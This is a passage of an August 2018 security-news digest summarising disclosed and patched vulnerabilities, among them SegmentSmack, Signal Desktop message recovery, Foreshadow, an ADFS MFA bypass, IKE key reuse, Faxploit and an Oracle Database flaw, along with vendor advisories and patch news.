“Juha-Matti Tilli reported that malicious peers could inject tiny packets in out_of_order_queue, forcing very expensive calls to tcp_collapse_ofo_queue() and tcp_prune_ofo_queue() for every incoming packet.” reads the security advisory.

“With tcp_rmem[2] default of 6MB, the ooo queue could contain ~7000 nodes. “

“Linux kernel versions 4.9+ can be forced to make very expensive calls to tcp_collapse_ofo_queue() and tcp_prune_ofo_queue() for every incoming packet which can lead to a denial of service.” states the description provided by the Mitre.

Devices running Linux kernel 4.9 and later are vulnerable to SegmentSmack, while Linux devices running Linux kernel 3.9 and later are vulnerable to FragmentSmack.

Most popular Linux distros, including Debian, Red Hat, and Ubuntu have already rolled out the security updates.

“The Linux kernel project has released an updated version that includes fixes for both [1, 2]. Companies and open source projects that use the Linux kernel for their custom operating systems will have to update the Linux kernel they use to include these two updates.” reported Bleeping Computer.

“Vendors of Linux-based SOHO routers will probably be slower in incorporating these updates. ISP-grade routers, firewall providers, cloud services, and hosting firms will also have to ship or deploy updates.”


CVE-2018-14023 – Recovering expired messages from Signal
17.8.2018 securityaffairs
Vulnerebility

An Italian cybersecurity passionate discovered that it was possible to recover the expired messages from Signal version 1.14.3,
Advisory ID:
n0sign4l-002
Risk level:
4 / 5
Title:
Signal Desktop – Recover Expired Messages
Credit:
Leonardo Porpora – ‘n0sign4l’
Product:
Signal
CVE:
CVE-2018-14023
Version:
1.14.3 and prior
Public Disclosure: 17/08/2018
Vendor:
Open Whisper System
Details
Signal version 1.14.3 was vulnerable to the recovery of expired messages.
When I reported the vulnerability to the Signal Security Team, its experts fixed it in a very short time, but the fix was partial; in fact version 1.14.4, even though fixed one vulnerability, was still vulnerable to a different attack. I reported the new issue to the security team and version 1.15.0-beta.10 finally addressed the problem.

Everything started from a message that was not cleared from the preview of Signal-Desktop

Signal bug

so I said this message must be stored somewhere…, I tried to dump the memory and BOOM 🙂 the message was still there. Messages were stored in the log [I think to double check that they are actually deleted] but they did not clear them with a garbage collector or whatever so I was able to recover them].
Signal bug 2
The version 1.14.4 fixed this issue but I wanted to try if it was possible to recover messages again from the logs and they were still there. The issue was related to IndexedDB not deleting messages predictably.

Below a video PoC of the vulnerability:

Solution
Update Signal to version 1.15.0-beta.10
Final thoughts:
I am very happy to have contributed to the security of Signal, an application that I use every day to talk with my friends, professors…

My contribution was also possible because this is an open-source project and other than just reporting the security hole I had the opportunity to analyze the source code and highlight the flaw.

This is a small example of how effective is the open-source model and I hope everyone can understand the benefits of the community contribution in data protection field so that everybody can provide contributions.

Sorry I can not hear you, there’s interference

n0sign4l 🙂
About the author Leonardo Porpora
I am 17 years old and since I started dealing with informatics and cybersecurity I have been inspired by E. Snowden character, bravery, and value, even when he faced hard consequences for his actions. To me, he is a really special person and I consider him like a brother.
Defending human rights – and privacy in particularly – is a must in a democratic society and for this reason, in my opinion, everybody should use Signal messaging application for their communications.
Original post @ http://n0sign4l.blogspot.com/2018/08/advisory-id-n0sign4l-002-risk-level-4-5.html


SAP Security Notes August 2018, watch out for SQL Injection
16.8.2018 securityaffairs
Vulnerebility

SAP released security notes for August 2018 that address dozens patches, the good news is that there aren’t critical vulnerabilities.
SAP issues 27 Security Notes, including 14 Patch Day Notes and 13 Support Package Notes. Seven notes are related to previously published patches.

“On 14th of August 2018, SAP Security Patch Day saw the release of 12 Security Notes. Additionally, there were 2 updates to previously released security notes.” reads the advisory published by SAP.

Principal type of vulnerabilities fixed by SAP security notes are SQL Injection and Information Disclosure flaws as reported in the following graph.

SAP security notes August 2018

According to the experts from ERPScan, in August Implementation Flaw and Missing Authorization Check are the largest groups in terms of the number of vulnerabilities

SAP security notes August 2018

SAP addressed nine high severity flaws, including two SQL injection vulnerabilities in SAP BusinessObjects that could be exploied by an attacker to extract information from vulnerable system.

The SQL injection issues were reported by the researchers at the security firm Onapsis that shared technical details of the flaws in a blog post.
“Two of these High Priority notes concern vulnerabilities reported by Onapsis Research Labs: one fixes two SQL Injection vulnerabilities in SAP BusinessObjects. Basically, an attacker with a low privileges session can inject data and extract information that he should not be able to. The other vulnerability fixes two bugs found in SAP HANA XSA.” reads the blog post published by Onapsis.

“Another High Priority Note reported by the Onapsis Research Labs, #2644154, is tagged with a CVSS v3 base score: 7.7/10. It fixes two SQL-injection (SQLi) vulnerabilities found in SAP BusinessObjects (BOBJ) by Onapsis researcher Gaston Traberg. The issues were found in the frontend webserver of the Central Management Console (CMC). One of these SQLi is a blind boolean-based SQLi, and the other a regular SQLi vulnerability.”

Security experts from ERPScan also published an interesting analysis of the security patches rolled out by SAP.
ERPScan focused the analysis on most serious vulnerabilities all rated as “high severity,” including the two SQL injection flaws found by Onapsis in BusinessObjects (CVE-2018-2447).

Other High severity flaws are a missing authorization check in the SAP SRM MDM Catalog (CVE-2018-2449), and a memory corruption flaw in the BusinessObjects Business Intelligence platform tracked as (CVE-2015-5237) that can be exploited by attackers to run arbitrary command on the vulnerable systems.
“An attacker can use [CVE-2018-2449] vulnerability to access a service without any authorization procedures and to use service functionality that has restricted access. This can lead to an information disclosure, privilege escalation, and other attacks,” states ERPScan.

“An attacker can use [CVE-2018-2447] vulnerability with a help of specially crafted SQL queries. He or she can read and modify sensitive information in a database, execute administration operations, destroy data or make it unavailable. In some cases, the hacker can access system data or execute OS commands. Install this SAP Security Note to prevent the risks”


Foreshadow/L1TF: What You Need to Know
15.8.2018 securityweek
Vulnerebility

The details of three new speculative execution vulnerabilities affecting Intel Xeon and Core processors were disclosed on Tuesday. The flaws have been dubbed Foreshadow and L1 Terminal Fault (L1TF), and patches and mitigations are already available.

The security holes were discovered independently by two teams of researchers. A team from KU Leuven, a university in Belgium, informed Intel of its findings on January 3, the day when the notorious Spectre and Meltdown vulnerabilities were disclosed to the public. The second team, comprising researchers from Israel-based Technion, University of Michigan, the University of Adelaide in Australia, and Australia-based CSIRO's Data61, reported its findings to Intel on January 23.

The Foreshadow/L1TF vulnerabilities are CVE-2018-3615, which impacts Intel’s Software Guard Extensions (SGX); CVE-2018-3620, which impacts operating systems and System Management Mode (SMM); and CVE-2018-3646, which affects virtualization software and Virtual Machine Monitors (VMM).Foreshadow

Researchers first discovered the vulnerability affecting SGX, a feature in Intel processors designed to protect user data even if an attacker takes control of the entire system. SGX was believed to be resilient to speculative execution attacks, but experts have now demonstrated that an attacker can read memory protected by SGX.

“Making things worse, due to SGX’s privacy features, an attestation report cannot be linked to the identity of its signer. Thus, it only takes a single compromised SGX machine to erode trust in the entire SGX ecosystem,” researchers explained on a website set up for the Foreshadow vulnerabilities.

During its investigation into the cause of Foreshadow, Intel discovered the two other flaws, which are tracked as Foreshadow-Next Generation (NG). Foreshadow-NG attacks can allow malicious actors to read information from the L1 cache, including information associated with the SMM, the operating system’s kernel, and hypervisors.

“Perhaps most devastating, Foreshadow-NG might also be used to read information stored in other virtual machines running on the same third-party cloud, presenting a risk to cloud infrastructure,” researchers said. “Finally, in some cases, Foreshadow-NG might bypass previous mitigations against speculative execution attacks, including countermeasures to Meltdown and Spectre.”

According to Intel, a malicious application installed on the targeted system can deduce data values from the operating system or other apps. Exploitation of the flaws can also allow a malicious guest VM to obtain data in the memory of the virtual machine manager (VMM) or other guest VMs.

Intel also says that the Foreshadow vulnerabilities allow malicious software to obtain data from the SMM memory. Finally, malware running outside or within an SGX enclave may be able to access data from another SGX enclave.

Intel and other tech giants have released updates and mitigations which, in combination with the patches released previously for speculative execution vulnerabilities (e.g. Meltdown and Spectre), should prevent attacks. Intel claims it has not seen any significant performance impact introduced by the available mitigations, either on PCs or data center workloads.

There is no evidence of malicious attacks exploiting these vulnerabilities.

Companies respond to Foreshadow

Microsoft has published both a security advisory describing the flaws and a blog post containing technical details. The company says it has released several updates that should mitigate Foreshadow on both consumer devices and on its Azure cloud services.

Google also says it has deployed mitigations to its infrastructure, including for the infrastructure that underpins its cloud services.

Amazon Web Services (AWS) told customers that its infrastructure includes protections for these types of attacks, and additional security mechanisms have been deployed for L1TF. “All EC2 host infrastructure has been updated with these new protections, and no customer action is required at the infrastructure level,” AWS said.

Oracle has also published a blog post describing which of its products are impacted and which are not, and provided instructions on how attacks can be mitigated.

VMware has published separate advisories for CVE-2018-3646 and CVE-2018-3620. The former affects VMware vSphere, Workstation, and Fusion, and the company says it has released updates that patch the issue. The latter impacts vCloud Usage Meter (UM), Identity Manager (vIDM), vCenter Server (vCSA), vSphere Data Protection (VDP), vSphere Integrated Containers (VIC) and vRealize Automation (vRA). Patches are pending for this vulnerability, but virtual appliance mitigations are available.

Cisco is also working on patches for the vulnerabilities. The networking giant says that while its products are not directly affected, they could still be targeted if the hosting environment is vulnerable.

“Cisco recommends that customers harden their virtual environments, tightly control user access, and ensure that all security updates are installed. Customers who are deploying products as a virtual device in multi-tenant hosting environments should ensure that the underlying hardware, as well as the operating system or hypervisor, is patched against the vulnerabilities in question,” the company said.

The Xen Project revealed that systems running any version of Xen are impacted.

“New microcode, and possibly a new firmware image is required to prevent SMM data from being leaked with this vulnerability,” Xen developers explained. “Software updates to Xen (details below) are required to prevent guests from being able to leak data belonging to Xen or to other guests in the system.”

Red Hat has published both technical and high level materials describing the Foreshadow flaws. The company is working on updates that should make it easier for its users to implement mitigations.

The list of Linux distributions that have also published advisories includes Suse, Debian, Gentoo and Ubuntu.


SAP Releases August 2018 Security Updates
15.8.2018 securityweek
Vulnerebility

SAP on Tuesday released its security updates for August 2018. The latest round of updates includes over two dozen patches, but none of them are for critical (hot news) vulnerabilities.

The German software giant has provided 27 SAP Security Notes, including 14 Patch Day Notes and 13 Support Package Notes. Seven of the total are updates to previously published patches.

SAP releases security updates for August 2018

Nine of the patches address high severity flaws, including two discovered by researchers at Onapsis, a company that specializes in securing Oracle and SAP applications.

“One [Security Note] fixes two SQL Injection vulnerabilities in SAP BusinessObjects. Basically, an attacker with a low privileges session can inject data and extract information that he should not be able to. The other vulnerability fixes two bugs found in SAP HANA XSA,” Onapsis said in a blog post detailing this month’s patches.

“The [SQL injection] issues were found in the frontend webserver of the Central Management Console (CMC). One of these SQLi is a blind SQLi, and the other a regular SQLi blind boolean-based SQLi vulnerability,” the company added. “These SQLi vulnerabilities [...] allow an attacker without privileges to get information from the Central Management Server System Database. As described, it is sensitive infrastructure information related to the BusinessObjects Enterprise platform, its structure and configuration.”

ERPScan, another company specializing in securing SAP applications, noted that six of the flaws resolved in the past month are implementation issues, while another six have been described as missing authorization checks.

ERPScan has provided a brief description for three of the most serious vulnerabilities patched by SAP with the August updates. The security holes, all rated “high severity,” include the SQL injection flaws found by Onapsis in BusinessObjects (CVE-2018-2447), a missing authorization check in the SAP SRM MDM Catalog (CVE-2018-2449), and a memory corruption flaw in the BusinessObjects Business Intelligence platform that can lead to arbitrary command execution (CVE-2015-5237).

“An attacker can use [CVE-2018-2449] to access a service without any authorization procedures and to use service functionality that has restricted access. This can lead to an information disclosure, privilege escalation, and other attacks,” ERPScan said.


Microsoft Patches Zero-Day Flaws in Windows, Internet Explorer
15.8.2018 securityweek
Vulnerebility

Microsoft’s Patch Tuesday updates for August 2018 address 60 vulnerabilities, including two zero-day flaws affecting Windows and Internet Explorer.

One of the actively exploited vulnerabilities is CVE-2018-8414, which Microsoft learned of from Matt Nelson of SpecterOps. Nelson disclosed the details of the bug in June after Microsoft told him that “the severity of the issue is below the bar for servicing and that the case will be closed.”

Proofpoint then revealed in July that a financially-motivated threat actor tracked by the company as TA505 had been exploiting the flaw to deliver the FlawedAmmyy RAT.

Microsoft described the issue as a Windows Shell remote code execution vulnerability that can be exploited by getting the targeted user to open a specially crafted file. The company says the flaw impacts Windows 10 and Windows Server (versions 1709 and 1803).

According to Trend Micro’s Zero Day Initiative (ZDI), the same vulnerability also impacts Adobe Acrobat Reader. ZDI researcher Abdul-Aziz Hariri reported the weakness to Adobe, which also released a patch for it on Tuesday.

“The Acrobat patch blocks the embedding of certain files types – a tactic Microsoft has already done with Office 365 docs,” ZDI explained in a blog post published after the patches were released. “This [Microsoft] patch prevents the bypassing of traditional file execution restrictions within Windows. It’s fascinating to see exploit authors combine different products to evade detection and proliferate their malware.”

The second zero-day vulnerability patched on Tuesday by Microsoft is CVE-2018-8373, a remote code execution flaw that exists due to how the scripting engine in Internet Explorer handles objects in memory.

The security hole was reported to Microsoft by Elliot Cao of Trend Micro Security Research, but Trend Micro has yet to make any information public on the attacks it has seen.

On the other hand, the security firm did reveal that CVE-2018-8373 is very similar to CVE-2018-8174, which Microsoft patched in May. CVE-2018-8174 had been exploited by an unnamed advanced persistent threat (APT) actor when it was fixed.

“[The vulnerability] used a new UAF vulnerability in vbscript.dll. This UAF occurs when the VBScript engine uses AssignVar to assign a value to the element of an array accessed by AccessArray,” ZDI explained. “Interestingly, the previous CVE was also being actively exploited when patched. In other words, if there are similar bugs to this one, they will likely be found and exploited, too.”

A total of 20 vulnerabilities patched this month by Microsoft have been rated “critical” and, unsurprisingly, many of them impact Edge and Internet Explorer. Remote code execution flaws discovered in SQL Server, Exchange, and Windows have also been assigned a “critical” severity rating.

Some of the more interesting vulnerabilities patched by Microsoft this month, whose details were disclosed shortly after the tech giant pushed out the security updates, include an Active Directory Federation Services (ADFS) issue discovered by Okta and an Exchange RCE flaw reported by an anonymous researcher through ZDI.


DoD Launches 'Hack the Marine Corps' Bug Bounty Program
15.8.2018 securityweek
Vulnerebility

The U.S. Department of Defense on Monday announced the launch of “Hack the Marine Corps,” the Military's sixth bug bounty program.

Similar to previous programs run by the Pentagon, Hack the Marine Corps is hosted by bug bounty platform HackerOne.

The goal of the bug bounty program, scheduled to run until August 26, is to help the Marine Corps improve the security of the Marine Corps Enterprise Network (MCEN), which is part of the DoD Information Network (DoDIN). The initiative will focus on the organization’s public websites and services.

Hack the Marine Corps kicked off at the DEF CON security conference in Las Vegas, where nearly 100 white hat hackers handpicked by the DoD attempted to find vulnerabilities for nine straight hours.

In this phase of the program, researchers earned more than $80,000 for finding 75 unique vulnerabilities.

“Hack the Marine Corps allows us to leverage the talents of the global ethical hacker community to take an honest, hard look at our current cybersecurity posture,” said Maj. Gen. Matthew Glavy, Commander of the U.S. Marine Corps Forces Cyberspace Command. “Our Marines need to operate against the best. What we learn from this program will assist the Marine Corps in improving our warfighting platform, the Marine Corps Enterprise Network. Working with the ethical hacker community provides us with a large return on investment to identify and mitigate current critical vulnerabilities, reduce attack surfaces, and minimize future vulnerabilities. It will make us more combat ready.”

Hack the Marine Corps was implemented with the help of Jack Cable, an 18-year-old who won the Hack the Air Force challenge. Cable has joined the Pentagon’s Defense Digital Service (DDS) for a tour of duty following his success in the previous bug bounty program.

The DoD launched its first bug bounty program, Hack the Pentagon, in May 2016. As a result of that program’s success, the organization decided to launch Hack the Army, Hack the Air Force, Hack the Air Force 2.0, and Hack the Defense Travel System.

Roughly 5,000 vulnerabilities were disclosed to the Pentagon as part of these programs, with ethical hackers earning hundreds of thousands of dollars for their work.


Crypto Flaw Affects Products From Cisco, Huawei, ZyXEL
15.8.2018 securityweek
Vulnerebility

A team of researchers has disclosed the details of a new attack method that can be used to crack encrypted communications. The products of several vendors, including Cisco, Huawei, ZyXEL and Clavister, are impacted.

The attack will be presented later this week at the 27th USENIX Security Symposium in Baltimore, Maryland, by researchers from the University of Opole in Poland and the Ruhr-University Bochum in Germany. The research paper has already been made public.

The experts have analyzed the impact of key reuse on Internet Protocol Security (IPsec), a protocol that authenticates and encrypts the data packets sent over a network. IPsec is often used for virtual private networks (VPNs).

The cryptographic key for IPsec uses the Internet Key Exchange (IKE) protocol, which has two versions, IKEv1 and IKEv2. Each version of IKE has different modes, configurations and authentication methods.

“[Reusing] a key pair across different versions and modes of IKE can lead to cross-protocol authentication bypasses, enabling the impersonation of a victim host or network by attackers,” the researchers explained. “We exploit a Bleichenbacher oracle in an IKEv1 mode, where RSA encrypted nonces are used for authentication. Using this exploit, we break these RSA encryption based modes, and in addition break RSA signature based authentication in both IKEv1 and IKEv2. Additionally, we describe an offline dictionary attack against the PSK (Pre-Shared Key) based IKE modes, thus covering all available authentication mechanisms of IKE.”

The attack has been found to work against Cisco (CVE-2018-0131), Huawei (CVE-2017-17305), ZyXEL (CVE-2018-9129) and Clavister (CVE-2018-8753) products.

Cisco, Huawei and ZyXEL published advisories for this vulnerability on Monday. Clavister, a provider of network security solutions, released patches for its Clavister cOS Core operating system in early May.

Cisco, which assigned the issue a severity rating of “medium,” described it as a vulnerability in the implementation of RSA-encrypted nonces in the company’s IOS and IOS XE software. An unauthenticated attacker can remotely obtain the encrypted nonces of an IKEv1 session by sending specially crafted ciphertexts to the targeted device.

ZyXEL says the vulnerability affects its ZyWALL and USG series network security appliances. The company has released firmware updates that should prevent attacks.

“ZyWALL/USG devices have a security vulnerability in the Internet Key Exchange (IKE) handshake implementation used for their IPsec-based VPN connections. Attackers might be able to use this vulnerability to retrieve IKEv1 session keys and decrypt connections by using a chosen-ciphertext attack called Bleichenbacher's attack,” the company told customers.

Huawei’s advisory reveals that the company’s firewall products are affected by the vulnerability. The company also noted that the IPsec IKEv1 implementations in its firewalls introduce two other flaws that can be used to cause a device to enter a denial-of-service (DoS) condition by sending specially crafted packets.


Adobe Patches 11 Flaws Across Four Products
15.8.2018 securityweek
Vulnerebility

The Patch Tuesday updates released by Adobe for August 2018 address nearly a dozen vulnerabilities in Flash Player, the Creative Cloud Desktop Application, Experience Manager, and Acrobat and Reader.

Five security holes have been fixed by the company in Flash Player, but none of them appear too serious. The company described the bugs fixed with the release of version 30.0.0.154 as “important” out-of-bounds read and security feature bypass issues that can lead to information disclosure.

One of the flaws, reported by Kai Song from Tencent, is a privilege escalation that can lead to arbitrary code execution, but its severity rating is also only “important.”

Adobe fixed two vulnerabilities in Acrobat and Reader for Windows and macOS. Both are considered “critical” and they both allow code execution.

In the Creative Cloud Desktop Application installer for Windows, the company resolved a DLL hijacking issue that can lead to privilege escalation.

Finally, patches released by Adobe for its Experience Manager product address two cross-site scripting (XSS) flaws that can result in information disclosure, and one input validation bypass vulnerability that can allow an attacker to modify information. All of these bugs have been assigned “moderate” severity ratings.

Adobe says it’s not aware of in-the-wild exploits for any of the vulnerabilities patched with this month’s updates. The company has assigned priority ratings of “2” to a majority of the flaws, which means the company does not expect to see malicious exploitation attempts any time soon.

Last month, researchers claimed they had found a potentially serious security issue in Adobe’s internal systems, but the company downplayed the impact of the vulnerability saying it was only an XSS flaw.


Vulnerability Could Allow Insider to Bypass CEO's Multi-Factor Authentication
15.8.2018 securityweek
Vulnerebility

Vulnerability Allows a Second Factor for One Account to be Used for All Accounts in an Organization

A simple vulnerability in Microsoft's Active Directory Federation Services (ADFS) can lead to catastrophic results. The flaw (CVE-2018-8340) was discovered by Okta researcher Andrew Lee; and patched by Microsoft in this month's Patch Tuesday security updates.

ADFS is used by third party vendors, such as Okta, Gemalto, Duo, Authlogics, RSA, and SecureAuth. It allows companies to add multi-factor authentication to their security controls. Exploiting the vulnerability allows any attacker with a valid second factor to access any other user's account if they can obtain that user's credentials. The flaw affects all third-party MFA vendors that use Microsoft's ADFS.

There is obviously some work to do by the attacker; but it is not that difficult. An insider would already have one part -- his or her own valid 2FA token. With that, he or she would be able to access any other employee's account by phishing their username and password, and combining it with his or her own MFA token.

In reality, 2FA is not always difficult to crack. Earlier this month it was disclosed that Reddit had suffered a breach following an SMS intercept that gained one user's SMS token. Alternatively, an attacker could phish for, or use a stolen database to gain ID and password, and then social engineer the help desk to reset the second factor. If he can log on as a user or process that has not yet been supplied with a second factor, then he might simply and automatically be granted one.

With just one full set of credentials (username, password and the second factor), an external attacker could phish for any other user's credentials and gain access without that user's second factor. If he manages to phish an admin, he has immediately hit the jackpot.

But even with lower privileges he will gain basic access to the network and can start looking for higher privileges. If he finds an admin password, this flaw will allow him to bypass any installed 2FA controls associated with the privileged account.

The flaw lies in the way in which ADFS communicates with the login process. The attacker will attempt to log in at the AD login page using two separate browsers -- one for each account. He then observes the authentication flow for each login, looking for the MFA Context and the MFA token for each user. The Context is labeled such in the page's HTML, while the MFA token appears in a script just below the context.

"By combining Bob’s MFA Context with Alice’s session cookie," writes Andrew Lee in an associated Okta blog, "the attacker can finish logging in as Alice using Bob’s second factor and MFA Token. The attacker does not need Alice’s second factor to log into her account."

After obtaining the session cookies, MFA Contexts, and MFA Tokens for himself and his target, the attacker first completes second-factor authentication with his owned MFA Token, then sends his MFA Context with his target's session cookie to the AD server. The AD server confirms with the MFA provider that the attacker's token was approved, then it logs the attacker in as the target.

The flaw is really very simple in concept. "The MFA Context contains an encrypted and signed copy of the MFA Token, using the AD server’s certificate/key pair to encrypt and sign," writes Lee. "Therefore the AD server can verify that it issued the MFA Token. However, the AD server does not verify the relationship of the MFA Token to the identity being logged in, allowing the attacker to log in as [the target] using [the attacker's] second factor."

One way to verify that relationship, suggests Okta, would be for Microsoft to include the username in the signed data of the MFA Context.

The flaw was discovered by researcher Andrew Lee in March 2018. Okta first attempted to mitigate the problem within its own ADFS Agent, but found this was not possible. In April, Okta reported the issue to Microsoft, who confirmed they were able to reproduce the issue within 4 days.

Microsoft set its remediation process in action, and set a patch date in early May. In July it filed CVE-2018-8340. It arranged to release its fix on Patch Tuesday (August 14, 2018); and Okta published the vulnerability details.

Okta told SecurityWeek that it has seen nothing to suggest that this flaw has been used against any of its customers.


Researcher Finds Hundreds of Planes Exposed to Remote Attacks
13.8.2018 securityweek
Vulnerebility

Hacking airplanes via satcom systems

A researcher has discovered that hundreds of airplanes from several airlines could have been hacked remotely from the ground through vulnerabilities in satellite communications systems.

Back in 2014, IOActive Principal Security Consultant Ruben Santamarta published a research paper describing theoretical attack scenarios on satellite communications. The expert resumed his research in November 2017, after taking a look at the in-flight entertainment system during a Norwegian flight.

After passively collecting traffic from the airplane’s Wi-Fi network, Santamarta noticed that several commonly used services, such as Telnet, HTTP and FTP, were available for certain IP addresses, and some interfaces associated with the plane’s on-board satellite communications (satcom) modems were accessible without authentication.

Further research into satcom systems revealed the existence of various types of vulnerabilities, including insecure protocols, backdoors, and improper configuration that could allow attackers to take control of affected devices. The expert disclosed his findings this week at the Black Hat security conference in Las Vegas.

Specifically, Santamarta has found security holes that can be exploited by remote hackers to take control of satcom equipment on commercial flights, earth stations on ships, and earth stations used by the U.S. military in conflict zones.

In the case of commercial aviation, the researcher discovered that hackers could have targeted, from the ground, hundreds of planes from Southwest, Norwegian and Icelandair.

Worryingly, in the case of one airplane, the researcher discovered that its satcom terminal had already been targeted from the ground by the Gafgyt IoT botnet via a compromised router.

“There is no indication that this malware family either had success accessing the SATCOM terminal on any aircraft or that it was specifically targeting airborne routers, so we should consider this situation as a ‘collateral damage’. However, the astonishing fact is that this botnet was, inadvertently, performing brute-force attacks against SATCOM modems located onboard an in-flight aircraft,” Santamarta wrote in his research paper.

Even more worrying is the fact that one of the vessels analyzed by the expert already had its Antenna Control Unit (ACU) infected with the Mirai malware.

In the military and maritime sectors, remote attacks on satcom systems could pose a safety risk. For instance, in the case of ships, attackers could disrupt communications and they can conduct cyber-physical attacks using high-intensity radiated field (HIRF), a radio-frequency energy strong enough to adversely affect living organisms and electronic devices. In the case of the military, malicious actors could abuse satcom systems to pinpoint the location of military units, disrupt communications, and conduct HIRF attacks.

On the other hand, remote attacks on an aircraft’s satcom equipment do not pose a safety risk due to the isolation between various systems on board. However, a hacker could still intercept or modify in-flight Wi-Fi traffic, and hijack devices belonging to passengers and crew.

IOActive disclosed the findings to affected vendors and organizations such as US-CERT and ICS-CERT, and while the aforementioned airlines and some of the affected equipment manufacturers have taken steps to address the issues, others have not been very open to collaboration.

In addition to Santamarta’s presentation at Black Hat, IOActive Senior Security Consultant Josep Pi Rodriguez, will on Sunday give a talk at the DEF CON conference on vulnerabilities discovered in the Extreme Networks embedded WingOS.

According to the researcher, the flaws he has identified can be exploited to hack millions of devices found in aircraft, government agencies, and smart cities.


Critical Flaws Found in NetComm Industrial Routers
13.8.2018 securityweek ICS 
Vulnerebility

An industrial router made by Australian telecommunications equipment company NetComm Wireless is affected by several serious vulnerabilities that can be exploited remotely to take control of affected devices.

According to an advisory published last week by ICS-CERT, NetComm 4G LTE Light industrial M2M routers running firmware version 2.0.29.11 and prior are impacted by four vulnerabilities. The list includes information disclosure, cross-site scripting (XSS) and cross-site request forgery (CSRF) issues that have been assigned the CVE identifiers CVE-2018-14782 through CVE-2018-14785.

Researcher Aditya K. Sood, who has been credited for finding the vulnerabilities, told SecurityWeek that one of the security holes allows an unauthenticated attacker to access information about a device’s web server. NetComm patches critical flaws in industrial routers

A CSRF vulnerability, present due to failure to enforce a token mechanism, can be exploited by a remote attacker to perform various actions, including to change the password to the router’s web interface.

An XSS flaw is caused by the failure of the application hosted on the embedded web server to implement input filtering and sanitization.

“Any arbitrary value passed by the remote user was processed and rendered in the application. As a result, the payload passed as a value gets executed in the browser. The attacker could have stolen session information or could have executed malicious code via the NetComm router web interface,” Sood explained.

The last vulnerability is an information disclosure issue that can be exploited by an attacker to obtain details on the router’s components.

 NetComm patches critical flaws in industrial routers

The CSRF and XSS flaws have been classified by ICS-CERT as “critical,” while the information disclosure issues are said to be “high severity.” CSRF and XSS flaws typically require the targeted user to click on a link.

The flaws can be exploited remotely from the Internet. A search revealed the existence of hundreds of devices exposed to attacks, Sood told SecurityWeek.

“The vulnerabilities combined with other sets of attacks and specific command execution to alter the configuration could result in compromising the device at the system level,” the researcher explained.

The expert reported his findings via ICS-CERT in October 2017. NetComm appears to have released a firmware update that patches the security holes in mid-May 2018.


Faxploit – Critical flaws potentially exposes millions of HP OfficeJet Printers to hack
13.8.2018 securityaffairs
Vulnerebility

A vulnerability in HP OfficeJet all-in-one inkjet printer can be exploited by attackers to gain control of the printer and use it as entry point into the network environment.
A critical vulnerability potentially exposes millions of HP OfficeJet printers to hack, according to the experts at Check Point the attackers only need to send a fax to the vulnerable printers.

The researchers discovered two critical vulnerabilities in HP’s implementation of a widely used fax protocol implemented in all its OfficeJet all-in-one inkjet printers.

The vulnerabilities affect the HP all-in-one printers that support Group 3 (G3) fax protocols that are part of the ITU T.30 standard for sending and receiving color faxes.

OfficeJet HP flawCheckpoint experts reported the flaws to HP and shared details for the two vulnerabilities at the DEF CON conference.

The researchers devised an attack technique dubbed Faxploit, they demonstrated that once the attackers have compromised a fax machine they could leverage the NSA exploit EternalBlue for lateral movements.

“The below diagram shows the Faxploit attack flow, following which a threat actor could then move laterally across your network to access your organization’s most confidential information.” reads the blog post published by CheckPoint Security.

“The crucial element to notice is that whereas most attacks today penetrate through an internet connection to enter an organization’s network, using this vulnerability in the fax protocol even a network that is completely detached would be vulnerable. This is due to the attack being channeled through a route that until now was considered to be secure and need not have protection layers applied.”

HP OfficeJet all-in-one inkjet printer 2

The experts explained that attackers run several type of attack, such as stealing documents or tampering with the fax content by replacing the documents received with altered versions of them.

The fax flaws could be exploited by attackers during the receiving handshake.

“We could reach this vulnerability by sending a huge XML (> 2GB) to the printer over TCP port 53048 thus triggering a stack-based buffer overflow. Exploiting this vulnerability then gave us full control over the printer, meaning that we could use this as a debugging vulnerability,” researchers wrote.

The expert explained that when sending a fax the OfficeJet printer it is used the TIFF image format. The sender’s fax broadcasts the .TIFF meta-data for the receiving fax machine to set transmission parameters such as page sizes. According to the ITU T.30 standard protocol, the receiver’s fax will have to analyze meta-data for data continuity and sanitation, but exports discovered that by sending a color fax, they noticed the sending/receiving machines used the image format .JPG instead of .TIFF.

“When we examined the code that handles the colourful faxes we found out another good finding: the received data is stored to a .jpg file without any check. In contrast to the .tiff case in which the headers are built by the receiver, in the .jpg case we controlled the entire file,” researchers noted. “When the target printer receives a colourful fax it simply dumps its content into a .jpg file (“%s/jfxp_temp%d_%d.jpg” to be precise), without any sanitation checks.”

The vulnerable OfficeJet printers used a custom JPEG parser to parse the fax data, instead of using libjpeg, the developers implemented their own JPEG parser.

The experts examined the parser and discovered two stack-based buffer overflow vulnerabilities.

HP also released security patches for both vulnerabilities tracked as CVE-2018-5925 and CVE-2018-5924.

“Two security vulnerabilities have been identified with certain HP Inkjet printers. A maliciously crafted file sent to an affected device can cause a stack or static buffer overflow, which could allow remote code execution.” reads the security advisory published by HP.


Oracle warns of CVE-2018-3110 Critical Vulnerability in Oracle Database product, patch it now!
13.8.2018 securityaffairs
Vulnerebility

Last week Oracle disclosed a critical vulnerability in its Oracle Database product, the issue tracked as CVE-2018-3110 has received a CVSS score of 9.9,
On Friday, Oracle released security patches to address a critical vulnerability affecting its Database product, the company is urging install them as soon as possible.

The vulnerability resides in the Java VM component of Oracle Database Server, a remote authenticated attacker can exploit it take complete control of the product and establish a shell access to the underlying server.

The vulnerability, tracked as CVE-2018-3110, affects Oracle Database 11.2.0.4, 12.2.0.1, 12.1.0.2 on Windows and 12.1.0.2 running on Unix or Linux.

“Vulnerability in the Java VM component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1 and 18.” reads the security advisory published by Oracle “Easily exploitable vulnerability allows low privileged attacker having Create Session privilege with network access via Oracle Net to compromise Java VM. While the vulnerability is in Java VM, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java VM. “

The Version 12.1.0.2 on both Windows and Unix/Linux systems was already addressed with the Oracle July 2018 CPU.

“Due to the nature of this vulnerability, Oracle recommends that customers apply these patches as soon as possible.” reads the blog post published by Oracle.

“This means that:

Customers running Oracle Database versions 11.2.0.4 and 12.2.0.1 on Windows should apply the patches provided by the Security Alert.
Customers running version 12.1.0.2 on Windows or any version of the database on Linux or Unix should apply the July 2018 Critical Patch Update if they have not already done so.”
Oracle “strongly recommends that customers take action without delay.”


Critical Vulnerability Patched in Oracle Database
13.8.2018 securityweek
Vulnerebility

Oracle informed customers late on Friday that its Database product is affected by a critical vulnerability. Patches have been released and users have been advised to install them as soon as possible.

